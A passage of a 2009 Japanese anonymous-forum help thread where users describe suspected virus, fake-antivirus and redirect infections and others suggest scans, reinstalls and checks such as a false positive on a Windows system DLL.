384:名無しさん@お腹いっぱい。
09/01/30 17:57:30
ですよねー
385:名無しさん@お腹いっぱい。
09/01/30 18:20:52
新種に感染して名前が在るってのも変だとか
記者は思わないのかねぇ
Nortonでずばりの名前がある
URLリンク(www.symantec.com)
386:名無しさん@お腹いっぱい。
09/02/01 09:44:09
URLリンク(detail.chiebukuro.yahoo.co.jp)
先日、「えこでこツール」というフリーソフトをDLし、 解凍してフォルダを開いたところ
「トロイの木馬に感染しました」というメッセージが出ました。
どうやら中に入っていた「uninstal.exe」が原因のようです。
慌てて隔離し、隔離室を空にしたのですが、これは削除出来たのでしょうか?
これと同じ症状が出てる troj_generic.dis
確かベクターとかでダウンロードしたはずなのになんでウイルスが入ってるんだろう
ダウンロードしてからかなり時間がたってるのに何で今頃警告が来るんだろう?
ワケがわからん
最近やったことといえばhugflashってソフトを
間違ってアンインスツールしたことぐらいしか思い当たらん
387:名無しさん@お腹いっぱい。
09/02/02 18:04:51
そいつは有名なソフトだな。
対応されたとか情報が見当たらんけど
とりあえずテンプレ使ってくれ。
388:名無しさん@お腹いっぱい。
09/02/05 21:24:56
【使用OS】 WindowsXP SP3
【Microsoft Update(MU)の状態】
【使用セキュリティソフトとバージョン】 AVG8、CA Anti-virus(試用版)、
KINGSOFT、Avast! 4.8Home、Dr.WEB
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 Yes
【スパイウェア対策ソフト】 Spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 Yes
【ルータの有無】 Yes
【スキャンの結果何が検出されたか】多過ぎて忘れた…
「XP AntiSpyware 2009」とかいうスパイウェアをうっかり踏んでしまいました
これによりウイルスがどっと入ってきて、全ドライブのhtmlファイル、
一部の実行ファイルが改竄され、何度駆除してもまだ残ってるようです
何度か再起動するとエクスプローラが起動しなかったり、
プリントスプーラなどがエラーを起こします
再インスコも何度もしましたが、他のドライブに感染したファイルが残っているようで
いたちごっこを繰り返してます
やっぱりフリー系よりノートンやバスターの方がいいのでしょうか?
しかしもう疲れました、PC窓から投げたいですorz
389:名無しさん@お腹いっぱい。
09/02/05 21:38:45
>>388
D:とかE:のルートにautorun.infが隠しファイルで存在してない?
ルータに接続してるPCは1台だけ?
390:名無しさん@お腹いっぱい。
09/02/05 21:39:55
自力で問題を解決できるような人なら
フリーの物と製品版、どちらを使っても差はあまりないと思うが
君は大人しく製品版のものを使った方がいいと思う。
391:名無しさん@お腹いっぱい。
09/02/05 21:50:42
マジレスお願いします。
いつも使ってるパソコン、ネット接続すると勝手に再起動するんだけど、
どうすればいいですか?
392:名無しさん@お腹いっぱい。
09/02/05 22:00:52
>>389
ルーターにPCは2台繋がってます
もう1台(今書き込んでるPC)には同じ症状は出ていないようです
>>390
そうかも知れないっすね
ちら裏ですが今は火の車なので試用版で我慢します…
393:名無しさん@お腹いっぱい。
09/02/05 22:04:16
>>388
>>274
394:名無しさん@お腹いっぱい。
09/02/05 22:05:04
>>391
いきなり再起動するなら故障。
続きは URLリンク(pc11.2ch.net)
395:名無しさん@お腹いっぱい。
09/02/05 22:40:55
【使用OS】 「XP」
【使用セキュリティソフトとバージョン】 「無料ソフト」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新してる」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なし」
会社のPCなので詳しいスペックはわからないっすorz
マルウェアが発見されましたって出て、HDドライブCが開けなくなったり。外付けHDが認識しなくなったり。
会社のPCが無料ソフトってどうなんだろうな・・・
396:388
09/02/05 22:42:24
>>389
>D:とかE:のルートにautorun.infが隠しファイルで存在してない?
これを調べるの忘れてました
そのファイルは見当たりませんでした
397:388
09/02/05 23:48:34
今のところ除去できないやつはW32/Virut.hというものらしいです
まさかバスターまでやられるなんて・・・orz
398: ◆N9P3SuvBPo
09/02/06 00:16:09
>397
リカバリを強く推奨します。
399:名無しさん@お腹いっぱい。
09/02/06 01:28:29
>>397
ウイルスがバックドアを開いて、PC内をいいようにされることもある。
そのまま使うと碌なことは無いよ。
>>398に禿同。早急にリカバリ。
400:名無しさん@お腹いっぱい。
09/02/06 02:02:02
【使用OS】 XP
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウィルスバスター2008
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 ウィルスバスターに任せてます
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
トラッキングクッキー程度しか検出されませんでした
今、普通に別のスレでレスしてたら、いきなりヘッドフォンに子供っぽい笑い声が途切れ気味で入ってきて、いきなり「あーあー」って喋りだしてきました。
感じ日本語じゃないっぽくて、一回ネット回線切ってまた繋げなおしたら叫び声っぽいのに変わってました。
ウィルスバスターには常に監視させており、FWも機能中です。
何かをDLしたわけでもありません。
どういった症状なんでしょうかコレ…。
401:名無しさん@お腹いっぱい。
09/02/06 03:10:24
バスター常駐させとけば安全だと思ってる人って・・・
402:名無しさん@お腹いっぱい。
09/02/06 07:19:20
少年と男性はオンラインゲーム仲間。男性が少年に「キャラクターを強くするプログラムをあげる」と偽って、
実際にはIDやパスワードなど、パソコンのキー操作の履歴を盗み取るスパイソフト「キーロガー」をネット上から
送りつけた。少年はゲームの動きが悪くなったことからキーロガーに気づき、ソフトを解析。盗まれた履歴の
送付先になっていた男性のメールアドレスやID、パスワードを割り出したという。
asahi.com URLリンク(www.asahi.com)
↑この少年が行った手口を、バカでもわかるように解説してください。m(._.)m
403:名無しさん@お腹いっぱい。
09/02/06 07:25:38
ソフトを解析。盗まれた履歴の送付先になっていた男性の
メールアドレスやID、パスワードを割り出した
404:名無しさん@お腹いっぱい。
09/02/06 07:51:57
それ「解説」やない。
405:名無しさん@お腹いっぱい。
09/02/06 08:15:02
パソコンのキー操作の履歴を盗み取るスパイソフト「キーロガー」をネット上から
送りつけた。
406:名無しさん@お腹いっぱい。
09/02/06 08:20:16
それ「少年が行った手口」やない。
407:名無しさん@お腹いっぱい。
09/02/06 08:26:05
少年と男性は ゲ
イ
408:388
09/02/06 12:19:17
>>398
>>399
どうもです
>>274のスレ行って、紹介されていた削除ツールで何とか駆除できたっぽいです
しばらくこれで様子を見てダメだったらHDD買ってリカバリします
409:名無しさん@お腹いっぱい。
09/02/06 17:36:55
>>402
その情報だと、ソフトというか
通信を解析したダケじゃないのかねぇ?
FWで出来るだろ。
410:名無しさん@お腹いっぱい。
09/02/13 17:39:03
★質問用テンプレ★
【使用OS】 「XP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2008」「ZoneAlarm」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「Spybot」「AD-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有 」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「何も見つからない」
質問です。
(スパイウェアスレで質問したのですが、普通に広告では?と言われてしまったのですが、
どうも不安なのでこちらでも質問いたしました。)
Firefoxを使っているのですが、
毎回起こるのではなく、ごくたまになのですが、
googleの検索結果に出てきたリンク先をクリックしたときに、
一瞬、67.210.15.11とか67.210.14.30などのIPアドレスに勝手にアクセスして
その後1001anything.comやらpc-health.infoやらのアドレスに勝手にアクセスしようと試みて
最後は自動でgoogleのトップページに戻ってしまうことがあります。
これは原因はなにかに感染しているということでしょうか?
なにに感染しているのでしょうか?検索してもさっぱりわかりません。。。
一応、spybotもadawareもトレンドマイクロのウイルス&スパイウェアチェックも全部かけました。
411:名無しさん@お腹いっぱい。
09/02/13 17:47:17
起動すると 正しくないイメージ~ って出ちゃうんですけど どう直せば良いですか?
412:名無しさん@お腹いっぱい。
09/02/13 18:14:54
>>410
バスタとZoneAlarmは機能競合を起こす。
ネットから切断した上で、ZoneAlarmとバスタw一度アンインスコ
そのあと、バスタのみをインストール
再びネットで定義更新してみる。
413:名無しさん@お腹いっぱい。
09/02/13 23:19:49
ウイルスバスターの会社(トレンドマイクロ)の社長は女性でそこそこ綺麗
トレンドマイクロの社長
URLリンク(internet.watch.impress.co.jp)
ソース
URLリンク(internet.watch.impress.co.jp)
414:名無しさん@お腹いっぱい。
09/02/13 23:23:33
キューティクルが光ってる!
415:名無しさん@お腹いっぱい。
09/02/14 00:09:42
>>413
名前や顔つきからしてもろにアッチ系だな…
お世辞にも美人とは言えないと思うがCEOだけあって印象だけは悪くない罠
416:名無しさん@お腹いっぱい。
09/02/14 00:56:28
どうでもいい……スレ違いだし
417:名無しさん@お腹いっぱい。
09/02/14 00:58:15
>>410
リカバリしろ
418:名無しさん@お腹いっぱい。
09/02/14 23:50:18
>>410
その解説をします。
GOOGLE検索であろうが、YAHOO検索であろうが、検索で表示されたサイトを
クリックするとリダイレクト(他のサイトへ強制移動)されますね?
パソコンがウィルスに感染しているのでは無く、そのサイトがフィッシングサイト、
又は、ウィルスコードを記述してあるサイトの可能性があるのです。
最近GOOGLEでは、そういったサイトに入れないように、ブロックして元の
検索画面に戻すという事を行っているようです。
悪意のあるフィッシングサイトでは、いかにも本物と同じようなHPもありますし、
偽物のセキュリティプログラムを購入させようと、勝手にHP内でスキャンをし、
ウィルスに感染してます!という警告を出すHPもちらほら見る事もあります。
僕が見る限り、このケースをだけ見ると感染していないように思えます。
あと、ウィルス感染の疑いがある時は絶対に!リカバリーしないでください。
無意味です。
ありえないかもしれませんが、ご心配であれば、別のウィルススキャン方法も
ありますので、ぜひお試しください。
419:418
09/02/14 23:52:22
貼り忘れてたTT
URLリンク(secure47.blog114.fc2.com)
420:名無しさん@お腹いっぱい。
09/02/15 19:06:10
>>418
まあ、それはいいがバスタはセーフモードで使えないぞ?
421:名無しさん@お腹いっぱい。
09/02/15 19:07:17
>ウィルス感染の疑いがある時は絶対に!リカバリーしないでください。
なんだこれ?ソースプリーズ。
422:名無しさん@お腹いっぱい。
09/02/15 19:14:15
ウイルスに感染したらリカバリ・クリーンインストールが基本。
システムの復元 を リカバリ だと思ってるとか言うオチかな?
結構間違ってる人居るみたいだし
423:名無しさん@お腹いっぱい。
09/02/15 19:21:23
ていうか>>410は何かのアドウェアに罹ってるだろ
424:名無しさん@お腹いっぱい。
09/02/15 19:25:46
しかし「Spybot」「AD-Aware」使っててかかってるからな……
あとは、リカバリかAVG Antirootkitでも試すぐらいしか
425: ◆N9P3SuvBPo
09/02/15 19:45:09
>419
URLリンク(secure47.blog114.fc2.com)
>1.ウィンドウズのアップデートを必ず行う。
>オフィスの脆弱性も、WINDOWS UPDATEで一緒にダウンロードする事が可能です。
Officeの脆弱性はWindowsUpdateでは修正されません。
Officeの脆弱性はMicrosoftUpdateを通じて修正されます。
426:名無しさん@お腹いっぱい。
09/02/15 19:49:32
>>425
補足乙
427: ◆N9P3SuvBPo
09/02/15 21:12:37
ちなみに、ITの資格を持ってる人なら、リカバリと修復インストールの違いも分かるはずですがねえ…。
428:名無しさん@お腹いっぱい。
09/02/15 21:25:17
ITの資格ならぬ、ITの死角ですな
429:名無しさん@お腹いっぱい。
09/02/15 21:29:52
>>427
資格いうやつほどあてにならんのがIT業界だすw
430: ◆N9P3SuvBPo
09/02/15 22:05:11
俺IT関連の資格は持ってないが、ウイルスに感染することは皆無ですねえ。
けど、そんな俺も昔はウイルスに感染した経験を持ってますが。
431:名無しさん@お腹いっぱい。
09/02/16 00:25:07
サイトが危険かどうか判定するスレってないの?
432: ◆N9P3SuvBPo
09/02/16 00:29:21
>431
それでしたらラウンジやPC初心者にありますよ。
「勇気」とか「鑑定」で検索してください。
433: ◆N9P3SuvBPo
09/02/16 00:30:25
PC初心者じゃなくて初心者の質問だ
434:名無しさん@お腹いっぱい。
09/02/16 00:36:47
>>432
サンクス
どうも白黒つかないサイトがあるんだよね
435:名無しさん@お腹いっぱい。
09/02/16 08:52:34
自作自演w
436:名無しさん@お腹いっぱい。
09/02/16 10:51:08
Malwarebytes' Anti-Malwareを入れようと思うんだけど、
このソフトって危険?
437:名無しさん@お腹いっぱい。
09/02/16 18:11:16
>>410はDNSChanger系のトロイに感染してるんでしょ
症状見たらすぐわかるじゃん
怪しいのはFirefoxのexeが入っているフォルダの中かもね
componentsフォルダの中に怪しいdll入ってないか?iamfamous.dllとか
そうなら違う駆除ソフトいろいろ試してみるといいよ
つーか、このスレこんなにレベル低かったっけ?
438:名無しさん@お腹いっぱい。
09/02/16 18:19:37
>>437
駆除ソフト色々って
特定のソフトを示せないんだと思うが
まあ、知ってたら書いてあげて
439:名無しさん@お腹いっぱい。
09/02/16 18:41:54
>>438
ベタだけどnortonで引っかかる気がする
というわけで>>410まだスレ見てたらやってみてよ
オンラインスキャンでもいいから
440:名無しさん@お腹いっぱい。
09/02/17 13:08:11
backdoorトロイに感染したファイルがあります。
ざまあ
441:名無しさん@お腹いっぱい。
09/02/17 15:28:43
>backdoorトロイに感染したファイル
トロイに感染したファイル?
ほほう。
442:名無しさん@お腹いっぱい。
09/02/20 14:27:04
URLリンク(hk.geocities.com)
この中にあるウィルスぬいてほしいお
443:名無しさん@お腹いっぱい。
09/02/20 15:26:39
消したが、それ以降の指示がないからファイルは消した。
444:名無しさん@お腹いっぱい。
09/02/21 01:29:24
知人から、USBメモリからPC本体に感染し、
いくつかのフォルダを削除して自らも消滅する
ウィルスが出たらしい、と聞きました。
しかし、いくつかの単語を放り込んで検索してみても
そんな症状は出てきません。
削除型の症状は、ほぼすべてがワームで、USBの
autorunで感染するタイプのものは、検索には
ひっかかってきませんでした。
何か聞いたことある方いませんか?
445:名無しさん@お腹いっぱい。
09/02/22 00:34:26
>>444
したとかみた方が早いかも。
URLリンク(jp.trendmicro.com)
446:名無しさん@お腹いっぱい。
09/02/22 02:44:41
>>445
ありがとう。
見てみたけど、該当しそうなものはみつかりませんでした。
自身で体験してないから詳細わからないのがもどかしいです。
知人の言うとおりだとすれば、定義ファイル対応前に破壊活動して
消滅されたらこちらでは対処しようがないし、通報もできません。
削除されたファイルがどれかわからないという事態も想定されますし、
場合によってはどこかに送信後消されている可能性もあるかも
しれません。
ただ、USBにも本体にもウィルスが残っていないのであれば、
どうやって感染活動しているのかよくわかりませんし、
実は原因が別にあるんじゃないかとも疑っているんです。
それで、何か情報があればと思いまして。
447: ◆N9P3SuvBPo
09/02/22 15:03:44
>446
例えばwebからの感染であれば…
あるwebサイトを訪問
↓
最新の定義にされたソフトでも発見できない亜種に密かに感染(潜伏)
↓
そのPCにUSBメモリを挿し込む
↓
そのUSBメモリに感染
あと、USBメモリー→PC→USBメモリーというパターン(橋渡しタイプ)は確率低いか…
どの道そちらで再検証するしかないですね。
俺らは画面の向こうで偉そうな事しか言えませんが…。
448:名無しさん@お腹いっぱい。
09/02/22 18:00:50
URLリンク(up.b9dm.com)
B9ってサイトでアニメ見ようとしたらavastで反応して削除したのですが
もう1回検査するだけで大丈夫でしょうか?削除したので分かりませんが
やばい物ですか?
449:名無しさん@お腹いっぱい。
09/02/22 20:09:50
Cryp_Xin2
ってウィルスに汚染されたんだけど、グーグルで検索しても
全然情報なくて
URLリンク(www.trendmicro.co.jp)
とりあえずここくらいなんだけど英語だし
どうしたらいいんだ。削除したけど「駆除不可能なウィルス」って
書いてるし・・ハァ
450:名無しさん@お腹いっぱい。
09/02/22 20:29:04
セーフモードからは?
451:名無しさん@お腹いっぱい。
09/02/23 07:35:11
>>449
削除したならいいだろ。
他のexeやdllを書き換える形で寄生するのが本来のウイルスで、
それを元に戻すのを「駆除」と表現する。
元々存在しなかったexeやdllを新たに生成するよくあるトロイでは
「駆除できないので削除」となる。表現の問題だよ。
452:名無しさん@お腹いっぱい。
09/02/24 13:20:16
flv動画から色々と変換してくれるツール探してたら
窓の杜にニコキャッチングとかいうのがあったからサイトにいってダウンロード&インストールし終わって
ファイルの中にあった何かわからないけど開いてみたら一瞬黒い画面の窓が開いて
英語っぽい白い文字がずらーと流れていって窓が勝手に閉じたんですが
そのあとにウィルス検索してみたら10個もかかりました(いつもは1~2個。
名前までは覚えてませんがこの「ニコキャッチング」の中にはいっていたのでしょうか?
あと一瞬でてきた黒い画面は何だったのかわかる人居れば教えてください;
453:名無しさん@お腹いっぱい。
09/02/24 13:21:56
>>452ですが自分で読み直してもわかりにくいものになってしまいました;
もしわかりにくかったらすいません;;
454:名無しさん@お腹いっぱい。
09/02/24 13:35:58
>>452
ffmpegていう動画・音声を変換するコマンドラインアプリケーション。
コマンドラインオプションを付けずに実行するとヘルプが表示される。
ffmpegと検出されたウイルスは関係ない。
455:名無しさん@お腹いっぱい。
09/02/24 13:43:42
Virus Totalに上げてみたけど、MSとpandaしかマルウェアに認定してなかったし
砂箱内で実行してみたけど特に何もなかったが・・・
456:名無しさん@お腹いっぱい。
09/02/24 14:41:17
>>452
> そのあとにウィルス検索してみたら10個もかかりました(いつもは1~2個。
なんでそんなに頻繁にウィルスに感染してるの?
457:名無しさん@お腹いっぱい。
09/02/24 17:47:06
ウイルスやトロイの木馬等は、いったん侵入すれば駆除しない限り存在し続けるのでしょうか。
例えば新品のPCを購入して、1ヶ月間アンチウイルスソフトを導入していなかったとします。
その後導入し、スキャンの結果ウイルスやトロイの木馬等といったものが検出されなかった場合、
そのPCは1ヶ月間まったく攻撃を受けていなかった、結果として危険性はなかったと考えてよろしいのでしょうか。
それとも、そんな単純なものではないのでしょうか。
こまめにウイルススキャンをして、そういったものが検出されなければ、一応そのつど安心してもよいものなのだろうかと思ったものでして。
よろしくお願いいたします。
458:名無しさん@お腹いっぱい。
09/02/24 17:57:02
ソフトの性能によるが仮にあるアンチウイルスソフトがどんなウイルスでも
100%見つけ出す性能を持っていてそれで見つからなければ無傷といえる
ただ、100%見つけ出すものなんてないし、作ることもできないから
絶対危険性がなかったとは言い切れない
>こまめにウイルススキャンをして、そういったものが検出されなければ、一応そのつど安心してもよいものなのだろうかと思ったものでして。
とりあえず安心しでもいいです
ただ検出されなかったのではなく、検出できなかった可能性もあるので絶対大丈夫とは思わないように。
459:457
09/02/24 18:23:11
どうもありがとうございます。
ということはウイルスやトロイの木馬等は、勝手に侵入してくることはあっても、
勝手にまた出て行ってしまう(消滅してしまう)ということはないわけですね。
アンチウイルスソフトを過信しないようにしながらも、これからもこまめにチェックするようにします。
460:名無しさん@お腹いっぱい。
09/02/24 22:01:42
初心者です。you tubeを開くと あやしい muhahaha!という画面が出てきて 画面が消えてしまいます。
どうしたらよいでしょうか?
461:名無しさん@お腹いっぱい。
09/02/24 22:26:32
【使用OS】 「XP home SP2」
【Microsoft Update(MU)の状態】 「自動更新設定」
【使用セキュリティソフトとバージョン】 「バスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「バスター2008」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか
検索時にポップアップが出て
スパイウェアの疑いが見つかりました
名前 C:\WINDOWS\SYSTEM32\ADVAPI32.DLL
危険度 高
実行した処理 隔離/隔離できません
とでて、ヘルプを参照しましたが、対処方法の表示がなく、検索も途中で
止まってしまっています。
お助けをお願いします・・
462: ◆N9P3SuvBPo
09/02/24 22:55:04
>461
この"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"というファイルがスパイウェアの疑いがあると、出てるんですね。
virustotalで上記のファイルをスキャンしてください。
URLリンク(www.virustotal.com)
さらに上記のファイルのプロパティを見て、作成日、会社名を教えてください。
463:名無しさん@お腹いっぱい。
09/02/24 23:09:09
>>462
>この"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"というファイルがスパイウェアの疑いがあると、出てるんですね。
virustotalで上記のファイルをスキャンしてください。
URLリンク(www.virustotal.com)
virustotalというのは初めて使用しましたが、
一行下記行がありました。
アンチウイルス バージョン 更新日 結果
Sunbelt 3.2.1851.2 2009.02.12 Trojan.Win32.Patched.B (vf)
>さらに上記のファイルのプロパティを見て、作成日、会社名を教えてください。
作成日 2001/12/4
会社名 Microsoft Corporation
となっております。
よろしくお願いします・・
464: ◆N9P3SuvBPo
09/02/24 23:26:14
>463
正規ファイル…か。
さてどうしたものやろ…とりあえず「リカバリをお奨めします」と言っておこうか。
その問題のファイルのサイズ(バイト数)を控えてください。
次に、問題のファイルの名前を変更してください。(ADVAPI32.DLL→ADVAPI32.BAKに)
暫く待てば、名前を変えたファイルの隣に「ADVAPI32.DLL」という名前のファイルが作成されると思います。
新たに作成された、ADVAPI32.DLLとADVAPI32.BAKのファイルサイズを教えてください。
465:名無しさん@お腹いっぱい。
09/02/24 23:35:26
>>464
新たに作成された、ADVAPI32.DLLとADVAPI32.BAKのファイルサイズを教えてください。
advapi.dll → 658KB
advapi.bak → 658KB
advapi.dllは変更前、後共に同じファイルサイズです。
何か対策があれば是非・・・m(_ _)m
466:465
09/02/24 23:38:53
「advapi」→「advapi32」
の間違いです。
すみません
467: ◆N9P3SuvBPo
09/02/24 23:39:29
>465
658KBの横にある()の中の数値も一緒ですか?
あと、先ほどのvirustotalで問題のファイルをスキャンしてみましたか?
スキャンしたのなら、結果をURLを貼って教えてください。
468:名無しさん@お腹いっぱい。
09/02/24 23:40:15
>>465
トレンドマイクロに検体に出して調べてもらう
469:645
09/02/24 23:46:45
>>467
>658KBの横にある()の中の数値も一緒ですか?
はい。同じです→673,792byte
検索結果
URLリンク(www.virustotal.com)
重ねてよろしくお願いいたします
470: ◆N9P3SuvBPo
09/02/24 23:51:30
>468
virustotalでスキャンすれば、アップロードされたファイルは各ベンダーに
送られるんじゃなかった?
>469
どうやら誤検出ですね…リカバリしなくても大丈夫です。
後はadvapi32.bakの方を削除しても構いません。(今削除できなくても再起動後に削除できるはずです)
advapi32.dllの方は削除しないように。